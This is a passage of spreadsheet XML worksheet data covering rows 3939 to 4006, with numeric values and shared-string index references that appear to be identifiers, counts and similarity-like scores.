      <c r="D3939" s="2">
        <v>1.0</v>
      </c>
      <c r="E3939" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3939" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="3940" ht="15.75" customHeight="1">
      <c r="A3940" s="1">
        <v>14533.0</v>
      </c>
      <c r="B3940" s="2">
        <v>3.9831597E7</v>
      </c>
      <c r="C3940" s="2" t="s">
        <v>3735</v>
      </c>
      <c r="D3940" s="2">
        <v>1.0</v>
      </c>
      <c r="E3940" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3940" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="3941" ht="15.75" customHeight="1">
      <c r="A3941" s="1">
        <v>1322.0</v>
      </c>
      <c r="B3941" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C3941" s="2" t="s">
        <v>3736</v>
      </c>
      <c r="D3941" s="2">
        <v>1.0</v>
      </c>
      <c r="E3941" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3941" s="2">
        <v>0.1137992831541218</v>
      </c>
    </row>
    <row r="3942" ht="15.75" customHeight="1">
      <c r="A3942" s="1">
        <v>18074.0</v>
      </c>
      <c r="B3942" s="2">
        <v>5.1621338E7</v>
      </c>
      <c r="C3942" s="2" t="s">
        <v>3737</v>
      </c>
      <c r="D3942" s="2">
        <v>1.0</v>
      </c>
      <c r="E3942" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3942" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="3943" ht="15.75" customHeight="1">
      <c r="A3943" s="1">
        <v>28621.0</v>
      </c>
      <c r="B3943" s="2">
        <v>2.7165628E7</v>
      </c>
      <c r="C3943" s="2" t="s">
        <v>3738</v>
      </c>
      <c r="D3943" s="2">
        <v>1.0</v>
      </c>
      <c r="E3943" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3943" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="3944" ht="15.75" customHeight="1">
      <c r="A3944" s="1">
        <v>33126.0</v>
      </c>
      <c r="B3944" s="2">
        <v>7020050.0</v>
      </c>
      <c r="C3944" s="2" t="s">
        <v>3739</v>
      </c>
      <c r="D3944" s="2">
        <v>1.0</v>
      </c>
      <c r="E3944" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3944" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="3945" ht="15.75" customHeight="1">
      <c r="A3945" s="1">
        <v>7325.0</v>
      </c>
      <c r="B3945" s="2">
        <v>5.0896759E7</v>
      </c>
      <c r="C3945" s="2" t="s">
        <v>3740</v>
      </c>
      <c r="D3945" s="2">
        <v>1.0</v>
      </c>
      <c r="E3945" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3945" s="2">
        <v>0.1136363636363636</v>
      </c>
    </row>
    <row r="3946" ht="15.75" customHeight="1">
      <c r="A3946" s="1">
        <v>3792.0</v>
      </c>
      <c r="B3946" s="2">
        <v>3.9952885E7</v>
      </c>
      <c r="C3946" s="2" t="s">
        <v>3741</v>
      </c>
      <c r="D3946" s="2">
        <v>1.0</v>
      </c>
      <c r="E3946" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3946" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="3947" ht="15.75" customHeight="1">
      <c r="A3947" s="1">
        <v>7884.0</v>
      </c>
      <c r="B3947" s="2">
        <v>5.2417149E7</v>
      </c>
      <c r="C3947" s="2" t="s">
        <v>3742</v>
      </c>
      <c r="D3947" s="2">
        <v>1.0</v>
      </c>
      <c r="E3947" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3947" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="3948" ht="15.75" customHeight="1">
      <c r="A3948" s="1">
        <v>13854.0</v>
      </c>
      <c r="B3948" s="2">
        <v>3.6899786E7</v>
      </c>
      <c r="C3948" s="2" t="s">
        <v>3584</v>
      </c>
      <c r="D3948" s="2">
        <v>1.0</v>
      </c>
      <c r="E3948" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3948" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="3949" ht="15.75" customHeight="1">
      <c r="A3949" s="1">
        <v>17837.0</v>
      </c>
      <c r="B3949" s="2">
        <v>5.0930443E7</v>
      </c>
      <c r="C3949" s="2" t="s">
        <v>3743</v>
      </c>
      <c r="D3949" s="2">
        <v>1.0</v>
      </c>
      <c r="E3949" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3949" s="2">
        <v>0.1121794871794872</v>
      </c>
    </row>
    <row r="3950" ht="15.75" customHeight="1">
      <c r="A3950" s="1">
        <v>304.0</v>
      </c>
      <c r="B3950" s="2">
        <v>1.5567869E7</v>
      </c>
      <c r="C3950" s="2" t="s">
        <v>3744</v>
      </c>
      <c r="D3950" s="2">
        <v>1.0</v>
      </c>
      <c r="E3950" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3950" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3951" ht="15.75" customHeight="1">
      <c r="A3951" s="1">
        <v>966.0</v>
      </c>
      <c r="B3951" s="2">
        <v>2.2737838E7</v>
      </c>
      <c r="C3951" s="2" t="s">
        <v>3745</v>
      </c>
      <c r="D3951" s="2">
        <v>1.0</v>
      </c>
      <c r="E3951" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3951" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3952" ht="15.75" customHeight="1">
      <c r="A3952" s="1">
        <v>2823.0</v>
      </c>
      <c r="B3952" s="2">
        <v>3.5395033E7</v>
      </c>
      <c r="C3952" s="2" t="s">
        <v>3746</v>
      </c>
      <c r="D3952" s="2">
        <v>1.0</v>
      </c>
      <c r="E3952" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3952" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3953" ht="15.75" customHeight="1">
      <c r="A3953" s="1">
        <v>3044.0</v>
      </c>
      <c r="B3953" s="2">
        <v>3.648619E7</v>
      </c>
      <c r="C3953" s="2" t="s">
        <v>3747</v>
      </c>
      <c r="D3953" s="2">
        <v>1.0</v>
      </c>
      <c r="E3953" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3953" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3954" ht="15.75" customHeight="1">
      <c r="A3954" s="1">
        <v>4100.0</v>
      </c>
      <c r="B3954" s="2">
        <v>4.130109E7</v>
      </c>
      <c r="C3954" s="2" t="s">
        <v>3748</v>
      </c>
      <c r="D3954" s="2">
        <v>1.0</v>
      </c>
      <c r="E3954" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3954" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3955" ht="15.75" customHeight="1">
      <c r="A3955" s="1">
        <v>4933.0</v>
      </c>
      <c r="B3955" s="2">
        <v>4.3996656E7</v>
      </c>
      <c r="C3955" s="2" t="s">
        <v>3749</v>
      </c>
      <c r="D3955" s="2">
        <v>1.0</v>
      </c>
      <c r="E3955" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3955" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3956" ht="15.75" customHeight="1">
      <c r="A3956" s="1">
        <v>7227.0</v>
      </c>
      <c r="B3956" s="2">
        <v>5.0659663E7</v>
      </c>
      <c r="C3956" s="2" t="s">
        <v>3750</v>
      </c>
      <c r="D3956" s="2">
        <v>1.0</v>
      </c>
      <c r="E3956" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3956" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3957" ht="15.75" customHeight="1">
      <c r="A3957" s="1">
        <v>7307.0</v>
      </c>
      <c r="B3957" s="2">
        <v>5.0852888E7</v>
      </c>
      <c r="C3957" s="2" t="s">
        <v>3751</v>
      </c>
      <c r="D3957" s="2">
        <v>1.0</v>
      </c>
      <c r="E3957" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3957" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3958" ht="15.75" customHeight="1">
      <c r="A3958" s="1">
        <v>7472.0</v>
      </c>
      <c r="B3958" s="2">
        <v>5.1292894E7</v>
      </c>
      <c r="C3958" s="2" t="s">
        <v>3752</v>
      </c>
      <c r="D3958" s="2">
        <v>1.0</v>
      </c>
      <c r="E3958" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3958" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3959" ht="15.75" customHeight="1">
      <c r="A3959" s="1">
        <v>9706.0</v>
      </c>
      <c r="B3959" s="2">
        <v>5.6382131E7</v>
      </c>
      <c r="C3959" s="2" t="s">
        <v>3753</v>
      </c>
      <c r="D3959" s="2">
        <v>1.0</v>
      </c>
      <c r="E3959" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3959" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3960" ht="15.75" customHeight="1">
      <c r="A3960" s="1">
        <v>9712.0</v>
      </c>
      <c r="B3960" s="2">
        <v>5.6391216E7</v>
      </c>
      <c r="C3960" s="2" t="s">
        <v>3754</v>
      </c>
      <c r="D3960" s="2">
        <v>1.0</v>
      </c>
      <c r="E3960" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3960" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3961" ht="15.75" customHeight="1">
      <c r="A3961" s="1">
        <v>10802.0</v>
      </c>
      <c r="B3961" s="2">
        <v>1.5814654E7</v>
      </c>
      <c r="C3961" s="2" t="s">
        <v>3755</v>
      </c>
      <c r="D3961" s="2">
        <v>1.0</v>
      </c>
      <c r="E3961" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3961" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3962" ht="15.75" customHeight="1">
      <c r="A3962" s="1">
        <v>14565.0</v>
      </c>
      <c r="B3962" s="2">
        <v>4.0059117E7</v>
      </c>
      <c r="C3962" s="2" t="s">
        <v>3756</v>
      </c>
      <c r="D3962" s="2">
        <v>1.0</v>
      </c>
      <c r="E3962" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3962" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3963" ht="15.75" customHeight="1">
      <c r="A3963" s="1">
        <v>24494.0</v>
      </c>
      <c r="B3963" s="2">
        <v>1.1090924E7</v>
      </c>
      <c r="C3963" s="2" t="s">
        <v>3757</v>
      </c>
      <c r="D3963" s="2">
        <v>1.0</v>
      </c>
      <c r="E3963" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3963" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="3964" ht="15.75" customHeight="1">
      <c r="A3964" s="1">
        <v>1782.0</v>
      </c>
      <c r="B3964" s="2">
        <v>2.9065302E7</v>
      </c>
      <c r="C3964" s="2" t="s">
        <v>3758</v>
      </c>
      <c r="D3964" s="2">
        <v>1.0</v>
      </c>
      <c r="E3964" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3964" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3965" ht="15.75" customHeight="1">
      <c r="A3965" s="1">
        <v>4808.0</v>
      </c>
      <c r="B3965" s="2">
        <v>4.3553511E7</v>
      </c>
      <c r="C3965" s="2" t="s">
        <v>3759</v>
      </c>
      <c r="D3965" s="2">
        <v>1.0</v>
      </c>
      <c r="E3965" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3965" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3966" ht="15.75" customHeight="1">
      <c r="A3966" s="1">
        <v>8634.0</v>
      </c>
      <c r="B3966" s="2">
        <v>5.4320794E7</v>
      </c>
      <c r="C3966" s="2" t="s">
        <v>3760</v>
      </c>
      <c r="D3966" s="2">
        <v>1.0</v>
      </c>
      <c r="E3966" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3966" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3967" ht="15.75" customHeight="1">
      <c r="A3967" s="1">
        <v>8658.0</v>
      </c>
      <c r="B3967" s="2">
        <v>5.4354104E7</v>
      </c>
      <c r="C3967" s="2" t="s">
        <v>3761</v>
      </c>
      <c r="D3967" s="2">
        <v>1.0</v>
      </c>
      <c r="E3967" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3967" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3968" ht="15.75" customHeight="1">
      <c r="A3968" s="1">
        <v>9651.0</v>
      </c>
      <c r="B3968" s="2">
        <v>5.6270238E7</v>
      </c>
      <c r="C3968" s="2" t="s">
        <v>3762</v>
      </c>
      <c r="D3968" s="2">
        <v>1.0</v>
      </c>
      <c r="E3968" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3968" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3969" ht="15.75" customHeight="1">
      <c r="A3969" s="1">
        <v>11645.0</v>
      </c>
      <c r="B3969" s="2">
        <v>2.3223567E7</v>
      </c>
      <c r="C3969" s="2" t="s">
        <v>3763</v>
      </c>
      <c r="D3969" s="2">
        <v>1.0</v>
      </c>
      <c r="E3969" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3969" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3970" ht="15.75" customHeight="1">
      <c r="A3970" s="1">
        <v>11653.0</v>
      </c>
      <c r="B3970" s="2">
        <v>2.3292569E7</v>
      </c>
      <c r="C3970" s="2" t="s">
        <v>3764</v>
      </c>
      <c r="D3970" s="2">
        <v>1.0</v>
      </c>
      <c r="E3970" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3970" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3971" ht="15.75" customHeight="1">
      <c r="A3971" s="1">
        <v>12074.0</v>
      </c>
      <c r="B3971" s="2">
        <v>2.6637416E7</v>
      </c>
      <c r="C3971" s="2" t="s">
        <v>3765</v>
      </c>
      <c r="D3971" s="2">
        <v>1.0</v>
      </c>
      <c r="E3971" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3971" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3972" ht="15.75" customHeight="1">
      <c r="A3972" s="1">
        <v>12454.0</v>
      </c>
      <c r="B3972" s="2">
        <v>2.9338469E7</v>
      </c>
      <c r="C3972" s="2" t="s">
        <v>3766</v>
      </c>
      <c r="D3972" s="2">
        <v>1.0</v>
      </c>
      <c r="E3972" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3972" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3973" ht="15.75" customHeight="1">
      <c r="A3973" s="1">
        <v>12470.0</v>
      </c>
      <c r="B3973" s="2">
        <v>2.9423453E7</v>
      </c>
      <c r="C3973" s="2" t="s">
        <v>3767</v>
      </c>
      <c r="D3973" s="2">
        <v>1.0</v>
      </c>
      <c r="E3973" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3973" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3974" ht="15.75" customHeight="1">
      <c r="A3974" s="1">
        <v>12486.0</v>
      </c>
      <c r="B3974" s="2">
        <v>2.951101E7</v>
      </c>
      <c r="C3974" s="2" t="s">
        <v>3768</v>
      </c>
      <c r="D3974" s="2">
        <v>1.0</v>
      </c>
      <c r="E3974" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3974" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3975" ht="15.75" customHeight="1">
      <c r="A3975" s="1">
        <v>14129.0</v>
      </c>
      <c r="B3975" s="2">
        <v>3.7893976E7</v>
      </c>
      <c r="C3975" s="2" t="s">
        <v>3769</v>
      </c>
      <c r="D3975" s="2">
        <v>1.0</v>
      </c>
      <c r="E3975" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3975" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3976" ht="15.75" customHeight="1">
      <c r="A3976" s="1">
        <v>15829.0</v>
      </c>
      <c r="B3976" s="2">
        <v>4.431159E7</v>
      </c>
      <c r="C3976" s="2" t="s">
        <v>3770</v>
      </c>
      <c r="D3976" s="2">
        <v>1.0</v>
      </c>
      <c r="E3976" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3976" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3977" ht="15.75" customHeight="1">
      <c r="A3977" s="1">
        <v>18249.0</v>
      </c>
      <c r="B3977" s="2">
        <v>5.2152864E7</v>
      </c>
      <c r="C3977" s="2" t="s">
        <v>3771</v>
      </c>
      <c r="D3977" s="2">
        <v>1.0</v>
      </c>
      <c r="E3977" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3977" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3978" ht="15.75" customHeight="1">
      <c r="A3978" s="1">
        <v>18536.0</v>
      </c>
      <c r="B3978" s="2">
        <v>5.3108116E7</v>
      </c>
      <c r="C3978" s="2" t="s">
        <v>3772</v>
      </c>
      <c r="D3978" s="2">
        <v>1.0</v>
      </c>
      <c r="E3978" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3978" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3979" ht="15.75" customHeight="1">
      <c r="A3979" s="1">
        <v>18992.0</v>
      </c>
      <c r="B3979" s="2">
        <v>5.4422509E7</v>
      </c>
      <c r="C3979" s="2" t="s">
        <v>3773</v>
      </c>
      <c r="D3979" s="2">
        <v>1.0</v>
      </c>
      <c r="E3979" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3979" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3980" ht="15.75" customHeight="1">
      <c r="A3980" s="1">
        <v>20031.0</v>
      </c>
      <c r="B3980" s="2">
        <v>7053993.0</v>
      </c>
      <c r="C3980" s="2" t="s">
        <v>3774</v>
      </c>
      <c r="D3980" s="2">
        <v>1.0</v>
      </c>
      <c r="E3980" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3980" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3981" ht="15.75" customHeight="1">
      <c r="A3981" s="1">
        <v>21026.0</v>
      </c>
      <c r="B3981" s="2">
        <v>1.7442473E7</v>
      </c>
      <c r="C3981" s="2" t="s">
        <v>3705</v>
      </c>
      <c r="D3981" s="2">
        <v>1.0</v>
      </c>
      <c r="E3981" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3981" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3982" ht="15.75" customHeight="1">
      <c r="A3982" s="1">
        <v>24506.0</v>
      </c>
      <c r="B3982" s="2">
        <v>1.1117759E7</v>
      </c>
      <c r="C3982" s="2" t="s">
        <v>3775</v>
      </c>
      <c r="D3982" s="2">
        <v>1.0</v>
      </c>
      <c r="E3982" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3982" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3983" ht="15.75" customHeight="1">
      <c r="A3983" s="1">
        <v>25513.0</v>
      </c>
      <c r="B3983" s="2">
        <v>1.4166673E7</v>
      </c>
      <c r="C3983" s="2" t="s">
        <v>3776</v>
      </c>
      <c r="D3983" s="2">
        <v>1.0</v>
      </c>
      <c r="E3983" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3983" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="3984" ht="15.75" customHeight="1">
      <c r="A3984" s="1">
        <v>267.0</v>
      </c>
      <c r="B3984" s="2">
        <v>1.5175358E7</v>
      </c>
      <c r="C3984" s="2" t="s">
        <v>3777</v>
      </c>
      <c r="D3984" s="2">
        <v>1.0</v>
      </c>
      <c r="E3984" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3984" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3985" ht="15.75" customHeight="1">
      <c r="A3985" s="1">
        <v>685.0</v>
      </c>
      <c r="B3985" s="2">
        <v>2.030255E7</v>
      </c>
      <c r="C3985" s="2" t="s">
        <v>3778</v>
      </c>
      <c r="D3985" s="2">
        <v>1.0</v>
      </c>
      <c r="E3985" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3985" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3986" ht="15.75" customHeight="1">
      <c r="A3986" s="1">
        <v>877.0</v>
      </c>
      <c r="B3986" s="2">
        <v>2.1902652E7</v>
      </c>
      <c r="C3986" s="2" t="s">
        <v>3779</v>
      </c>
      <c r="D3986" s="2">
        <v>1.0</v>
      </c>
      <c r="E3986" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3986" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3987" ht="15.75" customHeight="1">
      <c r="A3987" s="1">
        <v>1109.0</v>
      </c>
      <c r="B3987" s="2">
        <v>2.4046212E7</v>
      </c>
      <c r="C3987" s="2" t="s">
        <v>3780</v>
      </c>
      <c r="D3987" s="2">
        <v>1.0</v>
      </c>
      <c r="E3987" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3987" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3988" ht="15.75" customHeight="1">
      <c r="A3988" s="1">
        <v>1114.0</v>
      </c>
      <c r="B3988" s="2">
        <v>2.4074914E7</v>
      </c>
      <c r="C3988" s="2" t="s">
        <v>3781</v>
      </c>
      <c r="D3988" s="2">
        <v>1.0</v>
      </c>
      <c r="E3988" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3988" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3989" ht="15.75" customHeight="1">
      <c r="A3989" s="1">
        <v>1196.0</v>
      </c>
      <c r="B3989" s="2">
        <v>2.4738492E7</v>
      </c>
      <c r="C3989" s="2" t="s">
        <v>3782</v>
      </c>
      <c r="D3989" s="2">
        <v>1.0</v>
      </c>
      <c r="E3989" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3989" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3990" ht="15.75" customHeight="1">
      <c r="A3990" s="1">
        <v>1249.0</v>
      </c>
      <c r="B3990" s="2">
        <v>2.5168713E7</v>
      </c>
      <c r="C3990" s="2" t="s">
        <v>3783</v>
      </c>
      <c r="D3990" s="2">
        <v>1.0</v>
      </c>
      <c r="E3990" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3990" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3991" ht="15.75" customHeight="1">
      <c r="A3991" s="1">
        <v>1387.0</v>
      </c>
      <c r="B3991" s="2">
        <v>2.6191571E7</v>
      </c>
      <c r="C3991" s="2" t="s">
        <v>3784</v>
      </c>
      <c r="D3991" s="2">
        <v>1.0</v>
      </c>
      <c r="E3991" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3991" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3992" ht="15.75" customHeight="1">
      <c r="A3992" s="1">
        <v>1745.0</v>
      </c>
      <c r="B3992" s="2">
        <v>2.8818039E7</v>
      </c>
      <c r="C3992" s="2" t="s">
        <v>3785</v>
      </c>
      <c r="D3992" s="2">
        <v>1.0</v>
      </c>
      <c r="E3992" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3992" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3993" ht="15.75" customHeight="1">
      <c r="A3993" s="1">
        <v>1936.0</v>
      </c>
      <c r="B3993" s="2">
        <v>3.0187375E7</v>
      </c>
      <c r="C3993" s="2" t="s">
        <v>3786</v>
      </c>
      <c r="D3993" s="2">
        <v>1.0</v>
      </c>
      <c r="E3993" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3993" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3994" ht="15.75" customHeight="1">
      <c r="A3994" s="1">
        <v>2109.0</v>
      </c>
      <c r="B3994" s="2">
        <v>3.1352468E7</v>
      </c>
      <c r="C3994" s="2" t="s">
        <v>3787</v>
      </c>
      <c r="D3994" s="2">
        <v>1.0</v>
      </c>
      <c r="E3994" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3994" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3995" ht="15.75" customHeight="1">
      <c r="A3995" s="1">
        <v>2376.0</v>
      </c>
      <c r="B3995" s="2">
        <v>3.3301894E7</v>
      </c>
      <c r="C3995" s="2" t="s">
        <v>3788</v>
      </c>
      <c r="D3995" s="2">
        <v>1.0</v>
      </c>
      <c r="E3995" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3995" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3996" ht="15.75" customHeight="1">
      <c r="A3996" s="1">
        <v>2538.0</v>
      </c>
      <c r="B3996" s="2">
        <v>3.4107819E7</v>
      </c>
      <c r="C3996" s="2" t="s">
        <v>3789</v>
      </c>
      <c r="D3996" s="2">
        <v>1.0</v>
      </c>
      <c r="E3996" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3996" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3997" ht="15.75" customHeight="1">
      <c r="A3997" s="1">
        <v>2757.0</v>
      </c>
      <c r="B3997" s="2">
        <v>3.5101581E7</v>
      </c>
      <c r="C3997" s="2" t="s">
        <v>3790</v>
      </c>
      <c r="D3997" s="2">
        <v>1.0</v>
      </c>
      <c r="E3997" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3997" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3998" ht="15.75" customHeight="1">
      <c r="A3998" s="1">
        <v>2954.0</v>
      </c>
      <c r="B3998" s="2">
        <v>3.6011399E7</v>
      </c>
      <c r="C3998" s="2" t="s">
        <v>3791</v>
      </c>
      <c r="D3998" s="2">
        <v>1.0</v>
      </c>
      <c r="E3998" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3998" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="3999" ht="15.75" customHeight="1">
      <c r="A3999" s="1">
        <v>3325.0</v>
      </c>
      <c r="B3999" s="2">
        <v>3.7676302E7</v>
      </c>
      <c r="C3999" s="2" t="s">
        <v>3792</v>
      </c>
      <c r="D3999" s="2">
        <v>1.0</v>
      </c>
      <c r="E3999" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F3999" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4000" ht="15.75" customHeight="1">
      <c r="A4000" s="1">
        <v>3483.0</v>
      </c>
      <c r="B4000" s="2">
        <v>3.8404361E7</v>
      </c>
      <c r="C4000" s="2" t="s">
        <v>3793</v>
      </c>
      <c r="D4000" s="2">
        <v>1.0</v>
      </c>
      <c r="E4000" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4000" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4001" ht="15.75" customHeight="1">
      <c r="A4001" s="1">
        <v>3497.0</v>
      </c>
      <c r="B4001" s="2">
        <v>3.8477848E7</v>
      </c>
      <c r="C4001" s="2" t="s">
        <v>3794</v>
      </c>
      <c r="D4001" s="2">
        <v>1.0</v>
      </c>
      <c r="E4001" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4001" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4002" ht="15.75" customHeight="1">
      <c r="A4002" s="1">
        <v>3933.0</v>
      </c>
      <c r="B4002" s="2">
        <v>4.0594666E7</v>
      </c>
      <c r="C4002" s="2" t="s">
        <v>3795</v>
      </c>
      <c r="D4002" s="2">
        <v>1.0</v>
      </c>
      <c r="E4002" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4002" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4003" ht="15.75" customHeight="1">
      <c r="A4003" s="1">
        <v>3966.0</v>
      </c>
      <c r="B4003" s="2">
        <v>4.0747076E7</v>
      </c>
      <c r="C4003" s="2" t="s">
        <v>3796</v>
      </c>
      <c r="D4003" s="2">
        <v>1.0</v>
      </c>
      <c r="E4003" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4003" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4004" ht="15.75" customHeight="1">
      <c r="A4004" s="1">
        <v>4268.0</v>
      </c>
      <c r="B4004" s="2">
        <v>4.1861432E7</v>
      </c>
      <c r="C4004" s="2" t="s">
        <v>3797</v>
      </c>
      <c r="D4004" s="2">
        <v>1.0</v>
      </c>
      <c r="E4004" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4004" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4005" ht="15.75" customHeight="1">
      <c r="A4005" s="1">
        <v>4311.0</v>
      </c>
      <c r="B4005" s="2">
        <v>4.198743E7</v>
      </c>
      <c r="C4005" s="2" t="s">
        <v>3798</v>
      </c>
      <c r="D4005" s="2">
        <v>1.0</v>
      </c>
      <c r="E4005" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4005" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="4006" ht="15.75" customHeight="1">
      <c r="A4006" s="1">
        <v>4841.0</v>
      </c>
      <c r="B4006" s="2">
        <v>4.3687823E7</v>
      </c>
      <c r="C4006" s="2" t="s">
        <v>3799</v>
      </c>
